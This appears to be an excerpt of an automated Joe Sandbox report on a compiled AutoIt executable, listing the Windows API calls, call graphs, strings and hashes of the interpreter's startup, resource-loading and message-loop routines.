                                                            • Part of subcall function 00C639D5: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00C63A24
                                                            • Part of subcall function 00C639D5: ShowWindow.USER32(00000000,?,?), ref: 00C63A38
                                                            • Part of subcall function 00C639D5: ShowWindow.USER32(00000000,?,?), ref: 00C63A41
                                                            • Part of subcall function 00C6434A: _memset.LIBCMT ref: 00C64370
                                                            • Part of subcall function 00C6434A: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00C64415
                                                          Strings
                                                          • runas, xrefs: 00C9D33A
                                                          • This is a third-party compiled AutoIt script., xrefs: 00C9D279
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
                                                          • String ID: This is a third-party compiled AutoIt script.$runas
                                                          • API String ID: 529118366-3287110873
                                                          • Opcode ID: b3233b43cfcab6c71039193856bf42acfbeaa3a98d2585823d65222a99d00aa5
                                                          • Instruction ID: b3bd18f9576b09b933c2b5949edb6300674834d054f5e8a555333eec250ba9c9
                                                          • Opcode Fuzzy Hash: b3233b43cfcab6c71039193856bf42acfbeaa3a98d2585823d65222a99d00aa5
                                                          • Instruction Fuzzy Hash: B551E430908688FECF21EBB4EC85EFD7B74AF55714F104169F421A62A1CA705646DB35

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 996 c649a0-c64a00 call c67667 GetVersionExW call c67bcc 1001 c64a06 996->1001 1002 c64b0b-c64b0d 996->1002 1003 c64a09-c64a0e 1001->1003 1004 c9d767-c9d773 1002->1004 1006 c64a14 1003->1006 1007 c64b12-c64b13 1003->1007 1005 c9d774-c9d778 1004->1005 1008 c9d77b-c9d787 1005->1008 1009 c9d77a 1005->1009 1010 c64a15-c64a4c call c67d2c call c67726 1006->1010 1007->1010 1008->1005 1011 c9d789-c9d78e 1008->1011 1009->1008 1019 c64a52-c64a53 1010->1019 1020 c9d864-c9d867 1010->1020 1011->1003 1013 c9d794-c9d79b 1011->1013 1013->1004 1015 c9d79d 1013->1015 1018 c9d7a2-c9d7a5 1015->1018 1021 c9d7ab-c9d7c9 1018->1021 1022 c64a93-c64aaa GetCurrentProcess IsWow64Process 1018->1022 1019->1018 1023 c64a59-c64a64 1019->1023 1024 c9d869 1020->1024 1025 c9d880-c9d884 1020->1025 1021->1022 1030 c9d7cf-c9d7d5 1021->1030 1028 c64aaf-c64ac0 1022->1028 1029 c64aac 1022->1029 1031 c9d7ea-c9d7f0 1023->1031 1032 c64a6a-c64a6c 1023->1032 1033 c9d86c 1024->1033 1026 c9d86f-c9d878 1025->1026 1027 c9d886-c9d88f 1025->1027 1026->1025 1027->1033 1036 c9d891-c9d894 1027->1036 1037 c64ac2-c64ad2 call c64b37 1028->1037 1038 c64b2b-c64b35 GetSystemInfo 1028->1038 1029->1028 1039 c9d7df-c9d7e5 1030->1039 1040 c9d7d7-c9d7da 1030->1040 1034 c9d7fa-c9d800 1031->1034 1035 c9d7f2-c9d7f5 1031->1035 1041 c64a72-c64a75 1032->1041 1042 c9d805-c9d811 1032->1042 1033->1026 1034->1022 1035->1022 1036->1026 1053 c64ad4-c64ae1 call c64b37 1037->1053 1054 c64b1f-c64b29 GetSystemInfo 1037->1054 1043 c64af8-c64b08 1038->1043 1039->1022 1040->1022 1047 c9d831-c9d834 1041->1047 1048 c64a7b-c64a8a 1041->1048 1044 c9d81b-c9d821 1042->1044 1045 c9d813-c9d816 1042->1045 1044->1022 1045->1022 1047->1022 1050 c9d83a-c9d84f 1047->1050 1051 c64a90 1048->1051 1052 c9d826-c9d82c 1048->1052 1055 c9d859-c9d85f 1050->1055 1056 c9d851-c9d854 1050->1056 1051->1022 1052->1022 1061 c64ae3-c64ae7 GetNativeSystemInfo 1053->1061 1062 c64b18-c64b1d 1053->1062 1057 c64ae9-c64aed 1054->1057 1055->1022 1056->1022 1057->1043 1060 c64aef-c64af2 FreeLibrary 1057->1060 1060->1043 1061->1057 1062->1061
                                                          APIs
                                                          • GetVersionExW.KERNEL32(?), ref: 00C649CD
                                                            • Part of subcall function 00C67BCC: _memmove.LIBCMT ref: 00C67C06
                                                          • GetCurrentProcess.KERNEL32(?,00CEFAEC,00000000,00000000,?), ref: 00C64A9A
                                                          • IsWow64Process.KERNEL32(00000000), ref: 00C64AA1
                                                          • GetNativeSystemInfo.KERNELBASE(00000000), ref: 00C64AE7
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00C64AF2
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00C64B23
                                                          • GetSystemInfo.KERNEL32(00000000), ref: 00C64B2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: InfoSystem$Process$CurrentFreeLibraryNativeVersionWow64_memmove
                                                          • String ID:
                                                          • API String ID: 1986165174-0
                                                          • Opcode ID: a300b6ff304b31f65ed32efa392262f9b3db2421dd174acdf055960b53b4548e
                                                          • Instruction ID: 9ef8659decd11d35a572e3993fb310ede126278aa71d25f7642c42014551ef64
                                                          • Opcode Fuzzy Hash: a300b6ff304b31f65ed32efa392262f9b3db2421dd174acdf055960b53b4548e
                                                          • Instruction Fuzzy Hash: 5991E53198D7C0DECB35CBA885941AAFFF5AF29300B444DADD0DB97A42D220E648D76D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 1063 c64e89-c64ea1 CreateStreamOnHGlobal 1064 c64ea3-c64eba FindResourceExW 1063->1064 1065 c64ec1-c64ec6 1063->1065 1066 c64ec0 1064->1066 1067 c9d933-c9d942 LoadResource 1064->1067 1066->1065 1067->1066 1068 c9d948-c9d956 SizeofResource 1067->1068 1068->1066 1069 c9d95c-c9d967 LockResource 1068->1069 1069->1066 1070 c9d96d-c9d98b 1069->1070 1070->1066
                                                          APIs
                                                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,00C64D8E,?,?,00000000,00000000), ref: 00C64E99
                                                          • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00C64D8E,?,?,00000000,00000000), ref: 00C64EB0
                                                          • LoadResource.KERNEL32(?,00000000,?,?,00C64D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C64E2F), ref: 00C9D937
                                                          • SizeofResource.KERNEL32(?,00000000,?,?,00C64D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C64E2F), ref: 00C9D94C
                                                          • LockResource.KERNEL32(00C64D8E,?,?,00C64D8E,?,?,00000000,00000000,?,?,?,?,?,?,00C64E2F,00000000), ref: 00C9D95F
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                          • String ID: SCRIPT
                                                          • API String ID: 3051347437-3967369404
                                                          • Opcode ID: 92fbe36e859e63e8b1a927f84702bef180dc93986ca30d11466f0cab03b0c5bd
                                                          • Instruction ID: 3a7977e65cf49319b0c4f46fd112a1cafe7805c2343a3adaedf2f70d16db1b38
                                                          • Opcode Fuzzy Hash: 92fbe36e859e63e8b1a927f84702bef180dc93986ca30d11466f0cab03b0c5bd
                                                          • Instruction Fuzzy Hash: 901191B1200341BFD7258B65EC88F2BBBB9FBC5711F10416CF5158A150DB61DC018660
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: BuffCharUpper
                                                          • String ID:
                                                          • API String ID: 3964851224-0
                                                          • Opcode ID: d4d7c7a3a77ed5aa7fe42e6a697aa95aaac9fc3d50c16308f39169780ff6cb7b
                                                          • Instruction ID: 0daac02cf2b5991bb16dd824bf83742381b7667709ab22f256fde40716101eec
                                                          • Opcode Fuzzy Hash: d4d7c7a3a77ed5aa7fe42e6a697aa95aaac9fc3d50c16308f39169780ff6cb7b
                                                          • Instruction Fuzzy Hash: 7D925870608341DFD724DF24C480B2ABBE5BF85308F24896DE89A9B362D775ED45CB92
                                                          APIs
                                                          • GetFileAttributesW.KERNELBASE(?,00C9E398), ref: 00CC446A
                                                          • FindFirstFileW.KERNELBASE(?,?), ref: 00CC447B
                                                          • FindClose.KERNEL32(00000000), ref: 00CC448B
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: FileFind$AttributesCloseFirst
                                                          • String ID:
                                                          • API String ID: 48322524-0
                                                          • Opcode ID: 7896bb44f8a72baa0412386a02a05280bffd2d70b7f56829e9612923661f9060
                                                          • Instruction ID: 34a3f042a071e1a3a404d035a1606ec9390d8983f179afb575965d2f170d8b7a
                                                          • Opcode Fuzzy Hash: 7896bb44f8a72baa0412386a02a05280bffd2d70b7f56829e9612923661f9060
                                                          • Instruction Fuzzy Hash: 16E0D832810540674218AB38EC4DBED775C9E05335F20871DF935C50E0E7745D009595
                                                          Strings
                                                          • Variable must be of type 'Object'., xrefs: 00CA3E62
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Variable must be of type 'Object'.
                                                          • API String ID: 0-109567571
                                                          • Opcode ID: 7ebbf615ae7de004d18bd112d06e1e0dc277b2a9cd9b0f10d3d803702f078d9b
                                                          • Instruction ID: 2aa39c037969e27d9991b56c6b5a5845cb40ca0ce733eaed64e32f1749b96e60
                                                          • Opcode Fuzzy Hash: 7ebbf615ae7de004d18bd112d06e1e0dc277b2a9cd9b0f10d3d803702f078d9b
                                                          • Instruction Fuzzy Hash: C9A27B78A00215CFCB24CF99C4D0AAEB7B2FF59314F24806AE915AB351D771EE42DB91
                                                          APIs
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C70A5B
                                                          • timeGetTime.WINMM ref: 00C70D16
                                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00C70E53
                                                          • Sleep.KERNEL32(0000000A), ref: 00C70E61
                                                          • LockWindowUpdate.USER32(00000000,?,?), ref: 00C70EFA
                                                          • DestroyWindow.USER32 ref: 00C70F06
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C70F20
                                                          • Sleep.KERNEL32(0000000A,?,?), ref: 00CA4E83
                                                          • TranslateMessage.USER32(?), ref: 00CA5C60
                                                          • DispatchMessageW.USER32(?), ref: 00CA5C6E
                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00CA5C82
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Message$PeekSleepWindow$DestroyDispatchLockTimeTranslateUpdatetime
                                                          • String ID: @COM_EVENTOBJ$@GUI_CTRLHANDLE$@GUI_CTRLID$@GUI_WINHANDLE$@TRAY_ID
                                                          • API String ID: 4212290369-3242690629
                                                          • Opcode ID: 82f137c8bbb4188be0f32f34819a7799a85649329ba22f1fb9a10e24756ec2f4
                                                          • Instruction ID: d0c28da9b998d5991793fa62370a551a4d83e7c8a5f5350954cace931b6eb82d
                                                          • Opcode Fuzzy Hash: 82f137c8bbb4188be0f32f34819a7799a85649329ba22f1fb9a10e24756ec2f4
                                                          • Instruction Fuzzy Hash: 4CB2CF70608742DFD724DF24C884BAEB7E4BF85308F24891DF499972A1CB71E985DB92

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00CC8F5F: __time64.LIBCMT ref: 00CC8F69
                                                            • Part of subcall function 00C64EE5: _fseek.LIBCMT ref: 00C64EFD
                                                          • __wsplitpath.LIBCMT ref: 00CC9234
                                                            • Part of subcall function 00C840FB: __wsplitpath_helper.LIBCMT ref: 00C8413B
                                                          • _wcscpy.LIBCMT ref: 00CC9247
                                                          • _wcscat.LIBCMT ref: 00CC925A
                                                          • __wsplitpath.LIBCMT ref: 00CC927F
                                                          • _wcscat.LIBCMT ref: 00CC9295
                                                          • _wcscat.LIBCMT ref: 00CC92A8
                                                            • Part of subcall function 00CC8FA5: _memmove.LIBCMT ref: 00CC8FDE
                                                            • Part of subcall function 00CC8FA5: _memmove.LIBCMT ref: 00CC8FED
                                                          • _wcscmp.LIBCMT ref: 00CC91EF
                                                            • Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9824
                                                            • Part of subcall function 00CC9734: _wcscmp.LIBCMT ref: 00CC9837
                                                          • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00CC9452
                                                          • _wcsncpy.LIBCMT ref: 00CC94C5
                                                          • DeleteFileW.KERNEL32(?,?), ref: 00CC94FB
                                                          • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00CC9511
                                                          • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CC9522
                                                          • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00CC9534
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy_wcsncpy
                                                          • String ID:
                                                          • API String ID: 1500180987-0
                                                          • Opcode ID: 92788366156edf3c4b6a326f5aea733ff2e5e638a0580be70b9495bc14ac5581
                                                          • Instruction ID: f4ace951b504c03a41615e5804026147296b976cf361ca492210fc4bf1c8ca33
                                                          • Opcode Fuzzy Hash: 92788366156edf3c4b6a326f5aea733ff2e5e638a0580be70b9495bc14ac5581
                                                          • Instruction Fuzzy Hash: C0C14AB1D00219AADF25DFA5CC85EDEBBBCEF45300F0044AAF609E7151EB309A859F65

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C63074
                                                          • RegisterClassExW.USER32(00000030), ref: 00C6309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C630AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00C630CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C630DC
                                                          • LoadIconW.USER32(000000A9), ref: 00C630F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: 5a0f134e8a908623cb682c439b9bfd0a94af9a73fc3b8c2182b2057f737b5086
                                                          • Instruction ID: cb1a555031353ad84edb703a4890163b9b76e913f6c9328d87f94e0128ca59b5
                                                          • Opcode Fuzzy Hash: 5a0f134e8a908623cb682c439b9bfd0a94af9a73fc3b8c2182b2057f737b5086
                                                          • Instruction Fuzzy Hash: A33126B1841389AFDB60CFA4E885B9DBBF0FF19310F14452EE580EA2A0D7B94586CF51

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C63074
                                                          • RegisterClassExW.USER32(00000030), ref: 00C6309E
                                                          • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C630AF
                                                          • InitCommonControlsEx.COMCTL32(?), ref: 00C630CC
                                                          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C630DC
                                                          • LoadIconW.USER32(000000A9), ref: 00C630F2
                                                          • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                          • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                          • API String ID: 2914291525-1005189915
                                                          • Opcode ID: b8e01c0977814ae316340233e518fc1daa0cc72c783efb8a417c58c854f5fa8a
                                                          • Instruction ID: 27d27415397cffc3387c164760da9f98871937a98e1a66e5be95f67c6da4ca79
                                                          • Opcode Fuzzy Hash: b8e01c0977814ae316340233e518fc1daa0cc72c783efb8a417c58c854f5fa8a
                                                          • Instruction Fuzzy Hash: 4821C5B1901758AFDB10DFA4E889B9DBBF4FB18710F00812AF911EA3A0D7B545468FA5

                                                          Control-flow Graph

                                                          APIs
                                                            • Part of subcall function 00C64706: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00D252F8,?,00C637AE,?), ref: 00C64724
                                                            • Part of subcall function 00C8050B: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,00C67165), ref: 00C8052D
                                                          • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00C671A8
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00C9E8C8
                                                          • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00C9E909
                                                          • RegCloseKey.ADVAPI32(?), ref: 00C9E947
                                                          • _wcscat.LIBCMT ref: 00C9E9A0
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: NameQueryValue$CloseFileFullModuleOpenPath_wcscat
                                                          • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                          • API String ID: 2673923337-2727554177
                                                          • Opcode ID: 53e7d645e444194ac7306656f915cb12d774d2c9b830dc331ad3eda346f517fb
                                                          • Instruction ID: fa7fc32c9873ae5aaf7ad033cab21aaab25f443b4b9ea943837936f32d6642ee
                                                          • Opcode Fuzzy Hash: 53e7d645e444194ac7306656f915cb12d774d2c9b830dc331ad3eda346f517fb
                                                          • Instruction Fuzzy Hash: A3719F71109301DEC720EF25E8859ABBBE8FFA4314F50092EF455C72A0DB71DA4ADB66

                                                          Control-flow Graph

                                                          APIs
                                                          • GetSysColorBrush.USER32(0000000F), ref: 00C63A50
                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 00C63A5F
                                                          • LoadIconW.USER32(00000063), ref: 00C63A76
                                                          • LoadIconW.USER32(000000A4), ref: 00C63A88
                                                          • LoadIconW.USER32(000000A2), ref: 00C63A9A
                                                          • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00C63AC0
                                                          • RegisterClassExW.USER32(?), ref: 00C63B16
                                                            • Part of subcall function 00C63041: GetSysColorBrush.USER32(0000000F), ref: 00C63074
                                                            • Part of subcall function 00C63041: RegisterClassExW.USER32(00000030), ref: 00C6309E
                                                            • Part of subcall function 00C63041: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00C630AF
                                                            • Part of subcall function 00C63041: InitCommonControlsEx.COMCTL32(?), ref: 00C630CC
                                                            • Part of subcall function 00C63041: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00C630DC
                                                            • Part of subcall function 00C63041: LoadIconW.USER32(000000A9), ref: 00C630F2
                                                            • Part of subcall function 00C63041: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00C63101
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1680077288.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                          • Associated: 00000000.00000002.1680065303.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000CEF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680120931.0000000000D14000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680154904.0000000000D1E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1680169347.0000000000D27000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_c60000_CJE003889.jbxd
                                                          Similarity
                                                          • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                          • String ID: #$0$AutoIt v3
                                                          • API String ID: 423443420-4155596026
                                                          • Opcode ID: 7d67ddf34c2dcba83e40f83fdd70fa77ad9fe29717ef062755188d65179dc766
                                                          • Instruction ID: fc03829deb175e5a343ced77f5aec8d0afbfa209b17146b0e1659f15028598ee
                                                          • Opcode Fuzzy Hash: 7d67ddf34c2dcba83e40f83fdd70fa77ad9fe29717ef062755188d65179dc766
                                                          • Instruction Fuzzy Hash: 8C212970900345EBEB20DFA4FC49BAD7BB0EB18711F00411AE500AA3E1D7B556529BA8

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
